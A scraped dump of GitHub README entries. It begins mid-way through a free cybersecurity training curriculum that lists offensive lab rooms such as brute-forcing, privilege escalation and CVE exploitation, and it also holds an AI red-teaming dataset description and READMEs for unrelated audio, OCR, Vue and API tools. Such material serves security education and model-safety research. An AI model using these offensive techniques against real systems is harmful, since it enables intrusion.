Explaining how Search Engines work and leveraging them into finding hidden content! Osint - Intro to Open Source Intelligence. Shodan.io - Learn about Shodan.io and how to use it for device enumeration. ↑ Free Beginner Red Team Path Level 2 - Tooling Tmux - Learn to use tmux, one of the most powerful multi-tasking tools on linux. Nmap,Curl and Netcat - Get experience with Nmap, Curl and Netcat for network communications. Web Scanning - Learn the basics of automated web scanning. Sublist3r - Learn how to find subdomains with Sublist3r. Metasploit - An introduction to the main components of the Metasploit Framework. Hydra - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials. Linux Privesc - Practice your Linux Privilege Escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available. Red Team Fundamentals - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements. Red Team Recon - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. Red Team Intro CTFs Vulnversity - Learn about active recon, web app attacks and privilege escalation. Blue - Deploy & hack into a Windows machine, leveraging common misconfigurations issues. Simple CTF - Beginner level CTF. Bounty Hacker - A space cowboy-themed boot to root machine. ↑ Level 3 - Crypto & Hashes with CTF practice Crack the hash - Cracking hash challenges. Agent Sudo - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth. The Cod Caper - A guided room taking you through infiltrating and exploiting a Linux system. Ice - Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Lazy Admin - Easy linux machine to practice your skills. Basic Pentesting - This is a machine that allows you to practice web app hacking and privilege escalation. Bypassing UAC - Learn common ways to bypass User Account Control (UAC) in Windows hosts. ↑ Level 4 - Web OWASP top 10 - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. Inclusion - A beginner-level LFI challenge. Injection - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. Juiceshop - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities. Overpass - What happens when some broke CompSci students make a password manager. Year of the Rabbit - Can you hack into the Year of the Rabbit box without falling down a hole. DevelPy - Boot2root machine for FIT and bsides Guatemala CTF. Jack of all trades - Boot-to-root originally designed for Securi-Tay 2020. Bolt - Bolt themed machine to root into. ↑ Level 5 - Reverse Engineering & Pwn Intro to x86 64 - This room teaches the basics of x86-64 assembly language. CC Ghidra - This room teaches the basics of ghidra. CC Radare2 - This room teaches the basics of radare2. Reverse Engineering - This room focuses on teaching the basics of assembly through reverse engineering. Reversing ELF - Room for beginner Reverse Engineering CTF players. Dumping Router Firmware - Reverse engineering router firmware. Intro to pwntools - Introduction to popular pwn tools framework. Pwnkit: CVE-2021-4034 - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. ↑ Level 6 - PrivEsc Sudo Security Bypass - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series. Sudo Buffer Overflow - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series. Windows Privesc Arena - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. Linux Privesc Arena - Students will learn how to escalate privileges using a very vulnerable Linux VM. Windows Privesc - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. Blaster - Metasploit Framework to get a foothold. Ignite - A new start-up has a few security issues with its web server. Kenobi - Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. Capture the flag - Another beginner-level CTF challenge. Pickle Rick - Rick and Morty themed LFI challenge. Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs. Click here to get your red team badge! ↑ Free Beginner Blue Team Path Level 1 - Tools Introduction to digital forensics - Intro to Digital Forensics. Windows Fundamentals - Intro to Windows. Nessus - Intro to nessus scan. Mitre - Intro to Mitre attack framework. IntroSIEM - Introduction to SIEM. Yara - Intro to yara for malware analysis. OpenVAS - Intro to openvas. Intro to Honeypots - Intro to honeypots. Volatility - Intro to memory analysis with volatility. Red Line - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint. Autopsy - Use Autopsy to investigate artifacts from a disk image. ↑ Level 2 - Security Operations, Incident Response & Threat Hunting Investigating Windows - Investigating Windows. Juicy Details - A popular juice shop has been breached! Analyze the logs to see what had happened. Carnage - Apply your analytical skills to analyze the malicious network traffic using Wireshark. Squid Game - Squid game-themed CTF. Splunk Boss of the SOC V1 - Part of the Blue Primer series, learn how to use Splunk to search through massive amounts of information. Splunk Boss of the SOC V2 - Splunk analysis vol 2. Splunk Boss of the SOC V3 - Splunk analysis vol 3. Hunt Conti with Splunk - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server. Hunting for Execution Tactic - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Execution (TA0002). Hunting for Credential Access - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Credential Access (TA0006). Hunting for Persistence Access - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003). Hunting for Defense Evation - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Defense Evasion (TA0005). ↑ Level 3 - Beginner Forensics, Threat Intel & Cryptography Martryohka doll - Beginner file analysis challenge. The Glory of the Garden - Beginner image analysis challenge. Packets Primer - Beginner packet analysis challenge. Wireshark doo doo doo - Beginner packet analysis challenge. Wireshark two two two - Beginner packet analysis challenge. Trivial flag transfer protocol - Beginner packet analysis challenge. What Lies within - Beginner decoding analysis challenge. Illumination - Medium level forensics challenge. Emo - Medium level forensics challenge. Obsecure - Medium level forensics challenge. Intel101 Challenge - Medium level Threat Intel challenge. Introduction to Cryptohack - Medium level cryptography challenge. ↑ Level 4 - Memory & Disk Forensics Sleuthkit Intro - Medium level disk forensics challenge. Reminiscent - Medium level disk forensics challenge. Hunter - Windows Disk Image Forensics - Medium level disk forensics challenge. Spotlight - Mac Disk Image Forensics - Medium level disk forensics challenge. Ulysses - Linux Disk Image Forensics - Medium level disk forensics challenge. Banking Troubles - Windows Memory Image Forensics - Medium level memory forensics challenge. Detect Log4J - Medium level disk forensics challenge. ↑ Level 5 - Malware and Reverse Engineering History of Malware - Intro to malware history. Malware Introduction - Intro to malware. Basic Malware Reverse Engineering - Intro to malware RE. Intro Windows Reversing - Intro to Windows RE. Windows x64 Assembly - Introduction to x64 Assembly on Windows. JVM reverse engineering - Learn Reverse Engineering for Java Virtual Machine bytecode. Get PDF (Malicious Document) - Reversing PDF malware. Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs. Click here to get your blue team badge! ↑ Bonus CTF practice and Latest CVEs Bandit - Aimed at absolute beginners and teaches the basics of remote server access. Natas - Teaches the basics of serverside web-security. Post Exploitation Basics - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. Smag Grotto - An obsecure boot to root machine. Dogcat - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container. Buffer Overflow Prep - Practice stack-based buffer overflows. Break out the cage - Help Cage bring back his acting career and investigate the nefarious going on of his agent. Lian Yu - A beginner-level security challenge. Insecure Kubernetes - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability. The Great Escape (docker) - Escaping docker container. Solr Exploiting Log4j - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. Spring4Shell - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework. Most Recent threats - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities. ↑ Bonus Windows Attacktive Directory - Learn about 99% of Corporate networks that run off of AD. Retro - Breaking out of the retro-themed box. Blue Print - Hack into this Windows machine and escalate your privileges to Administrator. Anthem - Exploit a Windows machine in this beginner-level challenge. Relevant - Penetration Testing Challenge. ↑ Extremely Hard Rooms to do Ra - You have found WindCorp's internal network and their Domain Controller. Pwn the network. CCT2019 - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet. Theseus - The first installment of the SuitGuy series of very hard challenges. IronCorp - Get access to Iron Corp's system. Carpe Diem 1 - Recover your client's encrypted files before the ransomware timer runs out. Borderlands - Compromise a perimeter host and pivot through this network. Jeff - Hack into Jeff's web server. Year of the Owl - Owl-themed boot to root machine. Anonymous Playground - Want to become part of Anonymous? They have a challenge for you. EnterPrize - Enterprise-themed network to hack into. Racetrack Bank - It's time for another heist. Python Playground - Use python to pwn this room. ↑ Footnotes Inspired by https://skerritt.blog/free-rooms/ Contributors & stargazers ✨ Special thanks to everyone who forked or starred the repository ❤️ Thanks goes to these wonderful people ( emoji key ): Oaker Min 🚇 🚧 📖 💻 Michael Paul Coder 📖 This project follows the all-contributors specification. Contributions of any kind are welcome! ↑;🎓 Because Education should be free. Contributions welcome! 🕵️ ;cyber-security,awesome-list,curriculum,courses,free,education,educational-project,cybersecurity,hacking,learning-by-doing
brootware/awesome-cyber-security-university
malerba118/scrollex;Scrollex A library to help you make beautiful scroll experiences using minimal code. Docs https://scrollex-docs.vercel.app/ Demos https://scrollex-docs.vercel.app/examples https://user-images.githubusercontent.com/5760059/167218020-d1ff94a8-a138-418e-9ef0-779c849a7c23.mp4;Build beautiful scroll experiences using minimal code;[]
malerba118/scrollex
robbert-vdh/nih-plug;NIH-plug NIH-plug is an API-agnostic audio plugin framework written in Rust, as well as a small collection of plugins. The idea is to have a stateful yet simple plugin API that gets rid of as much unnecessary ceremony wherever possible, while also keeping the amount of magic to minimum and making it easy to experiment with different approaches to things. See the current features section for more information on the project's current status. Check out the documentation , or use the cookiecutter template to quickly get started with NIH-plug. Table of contents Plugins Framework Current features Building Plugin formats Example plugins Licensing Plugins Check each plugin's readme file for more details on what the plugin actually does. You can download the development binaries for Linux, Windows and macOS from the automated builds page. Or if you're not signed in on GitHub, then you can also find the latest nightly build here . You may need to disable Gatekeeper on macOS to be able to use the plugins. Scroll down for more information on the underlying plugin framework. Buffr Glitch is the plugin for you if you enjoy the sound of a CD player skipping This plugin is essentially a MIDI triggered buffer repeat plugin. When you play a note, the plugin will sample the period corresponding to that note's frequency and use that as a single waveform cycle. This can end up sounding like an in-tune glitch when used sparingly, or like a weird synthesizer when used less subtly. Crisp adds a bright crispy top end to any low bass sound. Inspired by Polarity's Fake Distortion video. Crossover is as boring as it sounds. It cleanly splits the signal into two to five bands using a variety of algorithms. Those bands are then sent to auxiliary outputs so they can be accessed and processed individually. Meant as an alternative to Bitwig's Multiband FX devices but with cleaner crossovers and a linear-phase option. Diopser is a totally original phase rotation plugin. Useful for oomphing up kickdrums and basses, transforming synths into their evil phase-y cousin, and making everything sound like a cheap Sci-Fi laser beam. Loudness War Winner does what it says on the tin. Have you ever wanted to show off your dominance by winning the loudness war? Neither have I. Dissatisfaction guaranteed. Puberty Simulator is that patent pending One Weird Plugin that simulates the male voice change during puberty! If it was not already obvious from that sentence, this plugin is a joke, but it might actually be useful (or at least interesting) in some situations. This plugin pitches the signal down an octave, but it also has the side effect of causing things to sound like a cracking voice or to make them sound slightly out of tune. Safety Limiter is a simple tool to prevent ear damage. As soon as there is a peak above 0 dBFS or the specified threshold, the plugin will cut over to playing SOS in Morse code, gradually fading out again when the input returns back to safe levels. Made for personal use during plugin development and intense sound design sessions, but maybe you'll find it useful too! Soft Vacuum is a straightforward port of Airwindows' Hard Vacuum plugin with parameter smoothing and up to 16x linear-phase oversampling, because I liked the distortion and just wished it had oversampling. All credit goes to Chris from Airwindows. I just wanted to share this in case anyone else finds it useful. Spectral Compressor can squash anything into pink noise, apply simultaneous upwards and downwards compressor to dynamically match the sidechain signal's spectrum and morph one sound into another, and lots more. Have you ever wondered what a 16384 band OTT would sound like? Neither have I. Framework Current features Supports both VST3 and CLAP by simply adding the corresponding nih_export_<api>!(Foo) macro to your plugin's library. Standalone binaries can be made by calling nih_export_standalone(Foo) from your main() function. Standalones come with a CLI for configuration and full JACK audio, MIDI, and transport support. Rich declarative parameter system without any boilerplate. Define parameters for your plugin by adding FloatParam , IntParam , BoolParam , and EnumParam<T> fields to your parameter struct, assign stable IDs to them with the #[id = "foobar"] , and a #[derive(Params)] does all of the boring work for you. Parameters can have complex value distributions and the parameter objects come with built-in smoothers and callbacks. Use simple enums deriving the Enum trait with the EnumParam<T> parameter type for parameters that allow the user to choose between multiple discrete options. That way you can use regular Rust pattern matching when working with these values without having to do any conversions yourself. Store additional non-parameter state for your plugin by adding any field that can be serialized with Serde to your plugin's Params object and annotating them with #[persist = "key"] . Optional support for state migrations, for handling breaking changes in plugin parameters. Group your parameters into logical groups by nesting Params objects using the #[nested(group = "...")] attribute. The #[nested] attribute also enables you to use multiple copies of the same parameter, either as regular object fields or through arrays. When needed, you can also provide your own implementation for the Params trait to enable compile time generated parameters and other bespoke functionality. Stateful. Behaves mostly like JUCE, just without all of the boilerplate. Comes with a simple yet powerful way to asynchronously run background tasks from a plugin that's both type-safe and realtime-safe. Does not make any assumptions on how you want to process audio, but does come with utilities and adapters to help with common access patterns. Efficiently iterate over an audio buffer either per-sample per-channel, per-block per-channel, or even per-block per-sample-per-channel with the option to manually index the buffer or get access to a channel slice at any time. Easily leverage per-channel SIMD using the SIMD adapters on the buffer and block iterators. Comes with bring-your-own-FFT adapters for common (inverse) short-time Fourier Transform operations. More to come. Optional sample accurate automation support for VST3 and CLAP that can be enabled by setting the Plugin::SAMPLE_ACCURATE_AUTOMATION constant to true . Optional support for compressing the human readable JSON state files using Zstandard . Comes with adapters for popular Rust GUI frameworks as well as some basic widgets for them that integrate with NIH-plug's parameter system. Currently there's support for egui , iced and VIZIA . A simple and safe API for state saving and restoring from the editor is provided by the framework if you want to do your own internal preset management. Full support for receiving and outputting both modern polyphonic note expression events as well as MIDI CCs, channel pressure, and pitch bend for CLAP and VST3. MIDI SysEx is also supported. Plugins can define their own structs or sum types to wrap around those messages so they don't need to interact with raw byte buffers in the process function. Support for flexible dynamic buffer configurations, including variable numbers of input and output ports. First-class support several more exotic CLAP features: Both monophonic and polyphonic parameter modulation are supported. Plugins can declaratively define pages of remote controls that DAWs can bind to hardware controllers. A plugin bundler accessible through the cargo xtask bundle <package> <build_arguments> command that automatically detects which plugin targets your plugin exposes and creates the correct plugin bundles for your target operating system and architecture, with cross-compilation support. The cargo subcommand can easily be added to your own project as an alias or globally as a regular cargo subcommand. Tested on Linux and Windows, with limited testing on macOS. Windows support has mostly been tested through Wine with yabridge . See the Plugin trait's documentation for an incomplete list of the functionality that has currently not yet been implemented. Building NIH-plug works with the latest stable Rust compiler. After installing Rust , you can compile any of the plugins in the plugins directory in the following way, replacing gain with the name of the plugin: shell cargo xtask bundle gain --release Plugin formats NIH-plug can currently export VST3 and CLAP plugins. Exporting a specific plugin format for a plugin is as simple as calling the nih_export_<format>!(Foo); macro. The cargo xtask bundle command will detect which plugin formats your plugin supports and create the appropriate bundles accordingly, even when cross compiling. Example plugins The best way to get an idea for what the API looks like is to look at the examples. gain is a simple smoothed gain plugin that shows off a couple other parts of the API, like support for storing arbitrary serializable state. gain-gui is the same plugin as gain, but with a GUI to control the parameter and a digital peak meter. Comes in three exciting flavors: egui , iced , and VIZIA . midi_inverter takes note/MIDI events and flips around the note, channel, expression, pressure, and CC values. This example demonstrates how to receive and output those events. poly_mod_synth is a simple polyphonic synthesizer with support for polyphonic modulation in supported CLAP hosts. This demonstrates how polyphonic modulation can be used in NIH-plug. sine is a simple test tone generator plugin with frequency smoothing that can also make use of MIDI input instead of generating a static signal based on the plugin's parameters. stft shows off some of NIH-plug's other optional higher level helper features, such as an adapter to process audio with a short-term Fourier transform using the overlap-add method, all using the compositional Buffer interfaces. sysex is a simple example of how to send and receive SysEx messages by defining custom message types. Licensing The framework, its libraries, and the example plugins in plugins/examples/ are all licensed under the ISC license . However, the VST3 bindings used by nih_export_vst3!() are licensed under the GPLv3 license. This means that unless you replace these bindings with your own bindings made from scratch, any VST3 plugins built with NIH-plug need to be able to comply with the terms of the GPLv3 license. The other plugins in the plugins/ directory may be licensed under the GPLv3 license. Check the plugin's Cargo.toml file for more information.;Rust VST3 and CLAP plugin framework and plugins - because everything is better when you do it yourself;vst3,framework,plugin-framework,plugin,rust,clap,nih-plug
robbert-vdh/nih-plug
InhiblabCore/vue-hooks-plus;# VueHooks Plus English | [简体中文](https://github.com/InhiblabCore/vue-hooks-plus/tree/master/README.zh-CN.md) High performance & Simplicity Vue3 Hooks library ✨ Features 🏄🏼‍♂️ Easy to learn and use 🔋 Supports SSR 🛸 Contains a comprehensive collection of basic Hooks 🏟️ A wide range of application scenarios 🦾 Preferred useRequest, Powerful request middle tier 🎪 Interactive demo, immersive 🎯 Written in TypeScript with predictable static types 🪄 Support the on-demand load, and reduce the packing volume 🤺 Playground, there's ample scope for one's abilities 🔐 Perfect test, safe and reliable 📦 Install bash npm i vue-hooks-plus CDN ```html ``` It will be exposed to global as VueHooks_Plus 🤹‍♀️ Usage typescript import { useRequest } from 'vue-hooks-plus' Introduced on demand typescript import useRequest from 'vue-hooks-plus/es/useRequest' Auto Import Vite ```ts import AutoImport from 'unplugin-auto-import/vite' import { VueHooksPlusResolver } from '@vue-hooks-plus/resolvers' export const AutoImportDeps = () => AutoImport({ imports: ['vue', 'vue-router'], include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/], dts: 'src/auto-imports.d.ts', resolvers: [VueHooksPlusResolver()], }) ``` Webpack ```ts const { VueHooksPlusResolver } = require('@vue-hooks-plus/resolvers') module.exports = { /* ... */ plugins: [ require('unplugin-auto-import/webpack')({ imports: ['vue', 'vue-router'], include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/], dts: 'src/auto-imports.d.ts', resolvers: [VueHooksPlusResolver()], }), ], } ``` For other supported tools, please see unplugin-auto-import Globalization Documentations English Documentations 中文文档 Example Vue Admin Novel Nuxt 3 Vite + Vue 3 Webpack + Vue 3 🤩 Awesome Template Ray Template 🪴 Project Activity Contributing Welcome to join us! You can check out the Contributing Guide to learn how to get started. Contributors Thanks for all their contributions 🐝 ! 🌸 Thanks This project is heavily inspired by the following awesome projects. ahooks @koale/useworker 📄 License MIT License © 2022-PRESENT YongGit;High performance & Simplicity 🧲 Vue 3 Hooks library;vue-hooks-plus,typescript,vue-hooks-library,hooks-library,vue3
InhiblabCore/vue-hooks-plus
anthropics/hh-rlhf;Overview This repository provides access to: 1. Human preference data about helpfulness and harmlessness from Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback 2. Human-generated red teaming data from Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned . Each of these datasets are described further below. Disclaimer : The data contain content that may be offensive or upsetting. Topics include, but are not limited to, discriminatory language and discussions of abuse, violence, self-harm, exploitation, and other potentially upsetting subject matter. Please only engage with the data in accordance with your own personal risk tolerance. The data are intended for research purposes, especially research that can make models less harmful. The views expressed in the data do not reflect the views of Anthropic or any of its employees. Human preference data about helpfulness and harmlessness The data are described in the paper: Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback . If you find the data useful, please cite the paper. The data format is very simple -- each line of the jsonl files contains a pair of texts, one "chosen" and one "rejected". For helpfulness , the data are grouped into train/test splits into three tranches: from our base models (context-distilled 52B language models), via rejection sampling (mostly with best-of-16 sampling) against an early preference model, and a dataset sampled during our iterated "online" process. For harmlessness , the data are only collected for our base models, but otherwise formatted in the same way. Details about the data collection process and crowdworker population can be found in the paper, specifically in Section 2 and Appendix D. Red teaming data The data are described in the paper: Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned . If you find the data useful, please cite the paper. Details about the data and data collection procedures can be found in the Datasheet in the appendix of the paper. Each line of the jsonl file contains a dictionary with the following fields: - transcript a text transcript of a conversation between a human adversary (red team member) and an AI assistant - min_harmlessness_score_transcript a real value score of the harmlessness of the AI assistant (lower is more harmful) as obtained from a preference model - num_params number of parameters in the language model powering the AI assistant - model_type type of model powering the AI assistant - rating the red team member's rating of how successful they were at breaking the AI assistant (Likert scale, higher is more successful) - task_description a short text description written by the red team member about how they tried to red team the AI assistant - task_description_harmlessness_score a real value score of the harmlessness of the task description (lower is more harmful) as obtained from a preference model - red_team_member_id an arbitrary identifier of the red team member. one red team member can generate multiple red team attacks - is_upworker a binary indicator that is true if the red team member was from the crowd platform Upwork or false if they were from MTurk - tags a list of up to 6 tags per transcript. tags are short descriptions of the red team attempts generated by crowdworkers who reviewed red team data post-hoc. tags were only provided for a random sample of 1000 red team attempts for two of four model types. Contact You can submit inquiries to: redteam@anthropic.com;Human preference data for "Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback";[]
anthropics/hh-rlhf
zh-lx/code-inspector;packages/code-inspector-plugin/README.md;Click the dom on the page, it will open your IDE and position the cursor to the source code location of the dom.;vue,vscode,webpack-plugin,code,devtools,inspector,react,vite-plugin
zh-lx/code-inspector
kha-white/manga-ocr;Manga OCR Optical character recognition for Japanese text, with the main focus being Japanese manga. It uses a custom end-to-end model built with Transformers' Vision Encoder Decoder framework. Manga OCR can be used as a general purpose printed Japanese OCR, but its main goal was to provide a high quality text recognition, robust against various scenarios specific to manga: - both vertical and horizontal text - text with furigana - text overlaid on images - wide variety of fonts and font styles - low quality images Unlike many OCR models, Manga OCR supports recognizing multi-line text in a single forward pass, so that text bubbles found in manga can be processed at once, without splitting them into lines. See also: - Poricom , a GUI reader, which uses manga-ocr - mokuro , a tool, which uses manga-ocr to generate an HTML overlay for manga - Xelieu's guide , a comprehensive guide on setting up a reading and mining workflow with manga-ocr/mokuro (and many other useful tips) - Development code, including code for training and synthetic data generation: link - Description of synthetic data generation pipeline + examples of generated images: link Installation You need Python 3.6 or newer. Please note, that the newest Python release might not be supported due to a PyTorch dependency, which often breaks with new Python releases and needs some time to catch up. Refer to PyTorch website for a list of supported Python versions. Some users have reported problems with Python installed from Microsoft Store. If you see an error: ImportError: DLL load failed while importing fugashi: The specified module could not be found. , try installing Python from the official site . If you want to run with GPU, install PyTorch as described here , otherwise this step can be skipped. Troubleshooting ImportError: DLL load failed while importing fugashi: The specified module could not be found. - might be because of Python installed from Microsoft Store, try installing Python from the official site problem with installing mecab-python3 on ARM architecture - try this workaround Usage Python API ```python from manga_ocr import MangaOcr mocr = MangaOcr() text = mocr('/path/to/img') ``` or ```python import PIL.Image from manga_ocr import MangaOcr mocr = MangaOcr() img = PIL.Image.open('/path/to/img') text = mocr(img) ``` Running in the background Manga OCR can run in the background and process new images as they appear. You might use a tool like ShareX or Flameshot to manually capture a region of the screen and let the OCR read it either from the system clipboard, or a specified directory. By default, Manga OCR will write recognized text to clipboard, from which it can be read by a dictionary like Yomichan . Clipboard mode on Linux requires wl-copy for Wayland sessions or xclip for X11 sessions. You can find out which one your system needs by running echo $XDG_SESSION_TYPE in the terminal. Your full setup for reading manga in Japanese with a dictionary might look like this: capture region with ShareX -> write image to clipboard -> Manga OCR -> write text to clipboard -> Yomichan https://user-images.githubusercontent.com/22717958/150238361-052b95d1-0152-485f-a441-48a957536239.mp4 To read images from clipboard and write recognized texts to clipboard, run in command line: commandline manga_ocr To read images from ShareX's screenshot folder, run in command line: commandline manga_ocr "/path/to/sharex/screenshot/folder" Note that when running in the clipboard scanning mode, any image that you copy to clipboard will be processed by OCR and replaced by recognized text. If you want to be able to copy and paste images as usual, you should use the folder scanning mode instead and define a separate task in ShareX just for OCR, which saves screenshots to some folder without copying them to clipboard. When running for the first time, downloading the model (~400 MB) might take a few minutes. The OCR is ready to use after OCR ready message appears in the logs. To see other options, run in command line: commandline manga_ocr --help If manga_ocr doesn't work, you might also try replacing it with python -m manga_ocr . Usage tips OCR supports multi-line text, but the longer the text, the more likely some errors are to occur. If the recognition failed for some part of a longer text, you might try to run it on a smaller portion of the image. The model was trained specifically to handle manga well, but should do a decent job on other types of printed text, such as novels or video games. It probably won't be able to handle handwritten text though. The model always attempts to recognize some text on the image, even if there is none. Because it uses a transformer decoder (and therefore has some understanding of the Japanese language), it might even "dream up" some realistically looking sentences! This shouldn't be a problem for most use cases, but it might get improved in the next version. Examples Here are some cherry-picked examples showing the capability of the model. | image | Manga OCR result | |----------------------|------------------| | | 素直にあやまるしか | | | 立川で見た〝穴〟の下の巨大な眼は: | | | 実戦剣術も一流です | | | 第30話重苦しい闇の奥で静かに呼吸づきながら | | | よかったじゃないわよ!何逃げてるのよ!!早くあいつを退治してよ! | | | ぎゃっ | | | ピンポーーン | | | LINK!私達7人の力でガノンの塔の結界をやぶります | | | ファイアパンチ | | | 少し黙っている | | | わかるかな〜? | | | 警察にも先生にも町中の人達に!! | Contact For any inquiries, please feel free to contact me at kha-white@mail.com Acknowledgments This project was done with the usage of: - Manga109-s dataset - CC-100 dataset;Optical character recognition for Japanese text, with the main focus being Japanese manga;ocr,japanese,manga,transformers,computer-vision,deep-learning,comics
kha-white/manga-ocr
EsperoTech/yaade;Yaade - Yet Another API Development Environment Yaade is an open-source, self-hosted, collaborative API development environment. 📚 Documentation Visit docs.yaade.io . 🤔 Why did you develop Yaade? I was looking for a self-hosted Postman alternative so that API collections can easily be shared between teammates. Even though popular solutions like Hoppscotch exist, their self-hosted app does not come with authentication and relies on Firebase for persistency. Yaade is developed from the ground up with self-hosting and security in mind. That means sensitive information in API requests can safely be stored on your own server! 🌟 Features Self-hosted: data never leaves your own server Multi-user: manage users and their permissions Persistent: even across container or server restarts Easy single-file data import / export Requests are executed on your machine so you can call localhost as well as remote servers Collection and Request description (documentation) with Markdown Request/Response scripts (for both collections and requests) Most importantly: dark mode default ⚡ Install To have the best experience with Yaade run the docker container on your server and install the browser extension on your local machine. 1. 🐋 Docker bash docker volume create yaade docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest The default password is password . After login go to ⚙️ > Account and change the password. 2. 🔧 Extension Yaade uses a browser extension as a proxy to enable CORS requests. Install the extension using your browsers extension store. Currently only a chrome extension is available. You can find it here . Then open it and input your server URL, eg. https://yaade.example.com/ . From that point all requests originating from your Yaade browser tabs will be proxied through the extension. ⬆️ Upgrade To upgrade the docker container with a new version, first stop the running container, pull the latest version and start a new container with the old volume. bash docker rm -f yaade docker pull esperotech/yaade:latest docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest 💾 Technology SPA built with TypeScript, React and Vite. Backend built with Kotlin. H2 file-based database. Browser extension with plain JavaScript. 🖥️ Local development Install the required dependencies Java 11 Kotlin Node >= 16 Clone the repository Install the project specific dependencies bash cd scripts/ chmod +x install.sh ./install.sh Start the server on port 9339 using your IDE of choice (I use IntelliJ IDEA) you can also run it by using the jar file directly $ java -jar server/build/libs/yaade-server-1.0-SNAPSHOT note that you must set the environment variable YAADE_ADMIN_USERNAME to run Start the vite dev server on port 9338 bash cd client/ npm run dev Start the dev-proxy on port 9337 bash cd dev-proxy/ node index.js Now open your browser and visit http://localhost:9337 🔨 Build bash cd scripts/ chmod +x build.sh ./build.sh Screenshots 🌙 Dark mode ☀️ Light mode More Screenshots 🤝 How can I contribute? Your contribution is very welcome! First open an issue about the topic you want to contribute on, eg. adding a new feature, bugfixing or refactoring. We will then discuss further details. Eventually, I will review your Pull Request and merge / release it.;Yaade is an open-source, self-hosted, collaborative API development environment.;selfhosted,docker,kotlin,typescript,h2-database,api,postman,hoppscotch
EsperoTech/yaade
joschuck/matrix-webcam;matrix-webcam This package displays your webcam video feed in the console. Take your next video conference from within the matrix! Running it Make sure you have Python and pip installed. Installation using pip: $ pip install matrix-webcam # make sure it's in your PATH for it to run, alternatively use sudo $ matrix-webcam Installing and running it from source: $ git clone https://github.com/joschuck/matrix-webcam.git $ cd matrix-webcam $ python -m pip install . $ matrix-webcam Tip: Shrink your font size, it will look even more hacky usage: matrix-webcam [-h] [-l LETTERS] [-p PROBABILITY] [-u UPDATES_PER_SECOND] options: -h, --help show this help message and exit -d DEVICE, --device DEVICE Sets the index of the webcam if you have more than one webcam. -l LETTERS, --letters LETTERS The number of letters produced per update. -p PROBABILITY, --probability PROBABILITY 1/p probability of a dispense point deactivating each tick. -u UPDATES_PER_SECOND, --updates-per-second UPDATES_PER_SECOND The number of updates to perform per second. Can I use this for Teams/Zoom/Skype etc.? For Windows/Mac Users Yes! You can for example use OBS Studio ~~ together with the Virtual Cam plugin ~~ . Notice: obs-studio have officially provided virtual camera feature since version 26.0.0 , you can use it without installing this plugin. Then all you need to do is select the virtual webcam in Teams/Zoom/Skype. For Linux Users First we need to make sure you have the v4l2loopback kernel module to create V4L2 loopback devices setup. This module allows you to create "virtual video devices". Normal (v4l2) applications will read these devices as if they were ordinary video devices, but the video will not be read from e.g. a capture card but instead it is generated by another application. It should be available in your distro's package manager. Under Ubuntu install it using: $ sudo apt install -y v4l2loopback-dkms v4l2loopback-utils Now we need to create a virtual v4l2 device (exclusive_caps=1 and YUV2 conversion is required by Chromium for the device to be recognized): $ sudo modprobe v4l2loopback devices=1 video_nr=42 card_label="Virtual Camera" exclusive_caps=1 max_buffers=2 Now we need to find the xid if the terminal window we will launch matrix-webcam in using $ xdotool getactivewindow 79869947 # sample output Optionally resize the terminal window to something reasonable from another terminal and then launch matrix webcam $ wmctrl -i -r 79869947 -e 0,300,300,1280,720 # in another terminal (2) Now launch matrix-webcam $ matrix-webcam # in the terminal that was just resized Now launch the virtual device in terminal (2) - you need Gstreamer for this, check the link on how to install it $ gst-launch-1.0 ximagesrc xid=79869947 ! video/x-raw,framerate=30/1 ! videoconvert ! video/x-raw,format=YUY2 ! v4l2sink device=/dev/video42 That's it, your webcam should show up in Chromium, Teams, etc.! Development I'd recommend creating a new virtual environment (if you are under 